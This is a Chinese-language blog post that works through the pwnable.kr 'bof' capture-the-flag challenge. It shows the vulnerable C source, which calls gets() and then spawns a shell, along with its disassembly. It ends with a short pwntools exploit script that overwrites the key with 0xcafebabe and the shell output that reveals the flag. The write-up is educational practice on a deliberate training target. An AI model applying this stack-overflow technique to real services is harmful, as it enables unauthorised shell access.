<!DOCTYPE html>
<html lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="HANqd">



<meta name="description" content="pwnable.kr-bof昨天整理了一下论文，打印上交，把答辩PPT做完，没有做题。">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="pwnable.kr-bof">
<meta property="og:url" content="https://hanqd.github.io/2019/05/21/pwnable bof/index.html">
<meta property="og:site_name" content="HANqd&#39;s BLOG">
<meta property="og:description" content="pwnable.kr-bof昨天整理了一下论文，打印上交，把答辩PPT做完，没有做题。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-05-21T12:26:45.344Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwnable.kr-bof">
<meta name="twitter:description" content="pwnable.kr-bof昨天整理了一下论文，打印上交，把答辩PPT做完，没有做题。">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="HANqd&#39;s BLOG" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>pwnable.kr-bof | HANqd&#39;s BLOG</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script>
        yiliaConfig.jquery_ui = [true, "//cdn.bootcss.com/jqueryui/1.10.4/jquery-ui.min.js", "//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css"];
    </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">HANqd</a></h1>
        </hgroup>

        
        <p class="header-subtitle">一个刚进军安全的小白。</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/随笔">随笔</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:1561402970@qq.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/304challenge/">304challenge</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/802-11协议/">802.11协议</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CSAPP笔记/">CSAPP笔记</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/IDA-Pro学习/">IDA Pro学习</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Misc/">Misc</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PAT每日一题/">PAT每日一题</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RSA/">RSA</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSTI/">SSTI</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/">XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn环境搭建/">pwn环境搭建</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/reverse/">reverse</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/">web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/《软件安全分析与应用》学习笔记/">《软件安全分析与应用》学习笔记</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/恶意软件样本/">恶意软件样本</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://hanqd.github.io/">HANqd</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于安全</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">HANqd</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">HANqd</a></h1>
            </hgroup>
            
            <p class="header-subtitle">一个刚进军安全的小白。</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/随笔">随笔</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:1561402970@qq.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我">
</nav>
      <div class="body-wrap"><article id="post-pwnable bof" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/05/21/pwnable bof/" class="article-date">
      <time datetime="2019-05-21T09:41:10.097Z" itemprop="datePublished">2019-05-21</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      pwnable.kr-bof
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/">pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="pwnable-kr-bof"><a href="#pwnable-kr-bof" class="headerlink" title="pwnable.kr-bof"></a>pwnable.kr-bof</h2><p>昨天整理了一下论文，打印上交，把答辩PPT做完，没有做题。<br><a id="more"></a></p>
<h3 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Nana told me that buffer overflow is one of the most common software vulnerability. </span><br><span class="line">Is that true?</span><br><span class="line"></span><br><span class="line">Download : http://pwnable.kr/bin/bof</span><br><span class="line">Download : http://pwnable.kr/bin/bof.c</span><br><span class="line"></span><br><span class="line">Running at : nc pwnable.kr 9000</span><br></pre></td></tr></table></figure>
<p>题目中看到这是一道栈溢出问题。</p>
<h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p>因为之前做过栈溢出的题目，所以有一定了解。</p>
<ol>
<li>先下载文件<br>在Linux系统中命令：wget +网址</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hdd@ubuntu:~/Desktop/bof$ wget http://pwnable.kr/bin/bof</span><br><span class="line">hdd@ubuntu:~/Desktop/bof$ wget http://pwnable.kr/bin/bof.c</span><br></pre></td></tr></table></figure>
<ol start="2">
<li>查看bof.c文件</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">func</span><span class="params">(<span class="keyword">int</span> key)</span></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> overflowme[<span class="number">32</span>];</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"overflow me : "</span>);</span><br><span class="line">	gets(overflowme);	<span class="comment">// smash me!</span></span><br><span class="line">	<span class="keyword">if</span>(key == <span class="number">0xcafebabe</span>)&#123;</span><br><span class="line">		system(<span class="string">"/bin/sh"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"Nah..\n"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span>* argv[])</span></span>&#123;</span><br><span class="line">	func(<span class="number">0xdeadbeef</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ol start="3">
<li>分析代码，找到会发生溢出的函数，gets(),这里没有对输入进行限制，会造成缓冲区溢出。只要使key值等于0xcafebabe，就会得到系统shell，获得flag。</li>
<li>查看一下bof的反汇编代码，查看func()的反汇编代码</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000062</span>c &lt;func&gt;:</span><br><span class="line"> <span class="number">62</span>c:	<span class="number">55</span>                   	push   %ebp</span><br><span class="line"> <span class="number">62</span>d:	<span class="number">89</span> e5                	mov    %esp,%ebp</span><br><span class="line"> <span class="number">62</span>f:	<span class="number">83</span> ec <span class="number">48</span>             	sub    $<span class="number">0x48</span>,%esp</span><br><span class="line"> <span class="number">632</span>:	<span class="number">65</span> a1 <span class="number">14</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>    	mov    %gs:<span class="number">0x14</span>,%eax</span><br><span class="line"> <span class="number">638</span>:	<span class="number">89</span> <span class="number">45</span> f4             	mov    %eax,<span class="number">-0xc</span>(%ebp)</span><br><span class="line"> <span class="number">63</span>b:	<span class="number">31</span> c0                	xor    %eax,%eax</span><br><span class="line"> <span class="number">63</span>d:	c7 <span class="number">04</span> <span class="number">24</span> <span class="number">8</span>c <span class="number">07</span> <span class="number">00</span> <span class="number">00</span> 	movl   $<span class="number">0x78c</span>,(%esp)</span><br><span class="line"> <span class="number">644</span>:	e8 fc ff ff ff       	call   <span class="number">645</span> &lt;func+<span class="number">0x19</span>&gt;</span><br><span class="line"> <span class="number">649</span>:	<span class="number">8</span>d <span class="number">45</span> d4             	lea    <span class="number">-0x2c</span>(%ebp),%eax</span><br><span class="line"> <span class="number">64</span>c:	<span class="number">89</span> <span class="number">04</span> <span class="number">24</span>             	mov    %eax,(%esp)</span><br><span class="line"> <span class="number">64</span>f:	e8 fc ff ff ff       	call   <span class="number">650</span> &lt;func+<span class="number">0x24</span>&gt;</span><br><span class="line"> <span class="number">654</span>:	<span class="number">81</span> <span class="number">7</span>d <span class="number">08</span> be ba fe ca 	cmpl   $<span class="number">0xcafebabe</span>,<span class="number">0x8</span>(%ebp)</span><br><span class="line"> <span class="number">65</span>b:	<span class="number">75</span> <span class="number">0</span>e                	jne    <span class="number">66</span>b &lt;func+<span class="number">0x3f</span>&gt;</span><br><span class="line"> <span class="number">65</span>d:	c7 <span class="number">04</span> <span class="number">24</span> <span class="number">9</span>b <span class="number">07</span> <span class="number">00</span> <span class="number">00</span> 	movl   $<span class="number">0x79b</span>,(%esp)</span><br><span class="line"> <span class="number">664</span>:	e8 fc ff ff ff       	call   <span class="number">665</span> &lt;func+<span class="number">0x39</span>&gt;</span><br><span class="line"> <span class="number">669</span>:	eb <span class="number">0</span>c                	jmp    <span class="number">677</span> &lt;func+<span class="number">0x4b</span>&gt;</span><br><span class="line"> <span class="number">66</span>b:	c7 <span class="number">04</span> <span class="number">24</span> a3 <span class="number">07</span> <span class="number">00</span> <span class="number">00</span> 	movl   $<span class="number">0x7a3</span>,(%esp)</span><br><span class="line"> <span class="number">672</span>:	e8 fc ff ff ff       	call   <span class="number">673</span> &lt;func+<span class="number">0x47</span>&gt;</span><br><span class="line"> <span class="number">677</span>:	<span class="number">8</span>b <span class="number">45</span> f4             	mov    <span class="number">-0xc</span>(%ebp),%eax</span><br><span class="line"> <span class="number">67</span>a:	<span class="number">65</span> <span class="number">33</span> <span class="number">05</span> <span class="number">14</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> 	xor    %gs:<span class="number">0x14</span>,%eax</span><br><span class="line"> <span class="number">681</span>:	<span class="number">74</span> <span class="number">05</span>                	je     <span class="number">688</span> &lt;func+<span class="number">0x5c</span>&gt;</span><br><span class="line"> <span class="number">683</span>:	e8 fc ff ff ff       	call   <span class="number">684</span> &lt;func+<span class="number">0x58</span>&gt;</span><br><span class="line"> <span class="number">688</span>:	c9                   	leave  </span><br><span class="line"> <span class="number">689</span>:	c3                   	ret</span><br></pre></td></tr></table></figure>
<p>从649那可以看出，局部变量的地址为edp-0x2c，从654看出，key值的地址在edp+x8，因为是32位的文件，所以构造如下数据进行填充：<br><code>payload=&#39;a&#39;*44+&#39;a&#39;*8+p32(0xcafebabe)</code></p>
<ol start="5">
<li>脚本代码</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">r=remote(<span class="string">'pwnable.kr'</span>,<span class="number">9000</span>)</span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">44</span>+<span class="string">'a'</span>*<span class="number">8</span>+p32(<span class="number">0xcafebabe</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<ol start="6">
<li>运行脚本，获得flag</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">hdd@ubuntu:~/Desktop/bof$ python bof.py</span><br><span class="line">[+] Opening connection to pwnable.kr on port 9000: Done</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">$ ls</span><br><span class="line">bof</span><br><span class="line">bof.c</span><br><span class="line">flag</span><br><span class="line">log</span><br><span class="line">log2</span><br><span class="line">super.pl</span><br><span class="line">$ cat flag</span><br><span class="line">daddy, I just pwned a buFFer :)</span><br></pre></td></tr></table></figure>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/05/21/pwnable bof/">pwnable.kr-bof</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">HANqd</a></p>
        <p><span>发布时间:</span>2019-05-21, 17:41:10</p>
        <p><span>最后更新:</span>2019-05-21, 20:26:45</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/05/21/pwnable bof/" title="pwnable.kr-bof">https://hanqd.github.io/2019/05/21/pwnable bof/</a>
            <span class="copy-path" data-clipboard-text="原文: https://hanqd.github.io/2019/05/21/pwnable bof/　　作者: HANqd" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target="_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2019/05/22/pwnable flag/">
                    pwnable.kr-flag
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2019/05/19/pwnable-collision/">
                    pwnable.kr-collision
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#pwnable-kr-bof"><span class="toc-number">1.</span> <span class="toc-text">pwnable.kr-bof</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#题目描述"><span class="toc-number">1.1.</span> <span class="toc-text">题目描述</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#题目分析"><span class="toc-number">1.2.</span> <span class="toc-text">题目分析</span></a></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"pwnable.kr-bof　| HANqd's BLOG　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    
      <div class="duoshuo" id="comments">
    <div id="comment-box"></div>
    <div class="ds-thread" id="ds-thread" data-thread-key="2019/05/21/pwnable bof/" data-title="pwnable.kr-bof" data-url="https://hanqd.github.io/2019/05/21/pwnable bof/"></div>
    <script>
        var duoshuoQuery = {short_name:""};
        var loadComment = function(){
            var d = document, s = d.createElement('script');
            s.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
            s.async = true; s.charset = 'UTF-8';
            (d.head || d.body).appendChild(s);
        }

        
    </script>
    
    <script> loadComment(); </script>

</div>
    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/05/22/pwnable flag/" title="上一篇: pwnable.kr-flag">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2019/05/19/pwnable-collision/" title="下一篇: pwnable.kr-collision">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/07/20/304(1)/">304challenge-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/01/软件安全分析与应用2/">《软件安全分析与应用》基础知识1</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/24/软件安全分析与应用1/">《软件安全分析与应用》总括</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/20/CSAPP（第三章1）/">《CSAPP》程序的机器级表示（第三章）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/17/CSAPP（浮点数）/">《CSAPP》浮点数+浮点数运算（第二章）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/15/CSAPP（整数运算）/">《CSAPP》整数运算（第二章）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/31/CSAPP2/">《CSAPP》 位移运算+机器中的整数表示（第二章）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/26/pwnable input/">pwnable.kr-input</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/24/pwnable random/">pwnable.kr-random</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/23/pwnable passcode/">pwnable.kr-passcode</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/22/pwnable flag/">pwnable.kr-flag</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/21/pwnable bof/">pwnable.kr-bof</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/19/pwnable-collision/">pwnable.kr-collision</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/18/pwnable-fd/">pwnable.kr-fd</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/10/CSAPP第二章/">CSAPP笔记-第二章 信息的表示和处理</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/05/20190505/">CSAPP笔记-第一章 计算机系统漫游</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/29/RSA/">Crypto RSA</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/28/misc realwifi/">Misc Realwifi</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/27/20190427/">恶意软件样本地址集合</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/21/oj web confusion1/">oj Web-Confusion1(SSTI攻击)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/19/oj pwn bof/">oj pwn-bof</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/17/oj XSS/">Web babyXSS</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/16/php3/">Web：BasicFileInclude</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/15/php2/">Web：Basic PHP2</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/13/oj php1/">Web：Basic PHP</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/13/Sql/">web oj:Basic SQL</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/12/oj Web/">Web calculator+Rapid Typing</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/11/20190411/">Web学习+oj Web</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/10/oj pwn/">pwn题目初尝试</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/09/pwn环境搭建/">pwn环境搭建（Ubuntu下）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/09/每日一题1017/">每日一题 1017（大数除法）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/08/每日一题1015 1016/">每日一题1015（结构体+sort排序）+1016</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/07/IDA Pro学习1/">IDA Pro权威指南-第一章 反汇编简介</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/06/每日一题1014/">每日一题 1014</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/05/每日一题1011 1012 1013/">每日一题 1011+1012+1013</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/04/Misc shell/">Misc shell</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/02/每日一题1010/">每日一题 1010</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/02/20190402/">pwn-栈溢出（1）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/01/20190401/">每日一题 1009+vector容器</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/31/每日一题1008/">每日一题 1008+pwn学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/30/每日一题/">每日一题 1007+Misc Another 01Game</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/29/每日一题1006/">每日一题 1006</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/28/Misc Forensics2/">Misc：Forensics2（流量分析题）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/28/每日一题1005/">每日一题 1005</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/28/reverse1/">CTF逆向reverse：Reverse sign in</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/27/每日一题1004/">每日一题 1004</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/26/Web calculate/">Web calculator</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/26/每日一题1003/">每日一题 1003</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/18/Python数据类型（整数、浮点数、数据类型转换）/">Python笔记——数据类型（整数、浮点数、数据类型转换）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/17/Python数据类型（字符串）/">Python笔记——数据类型（字符串）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/15/你好，hexo/">你好，hexo</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/15/hello-world/">Hello World</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019 HANqd
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit" title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
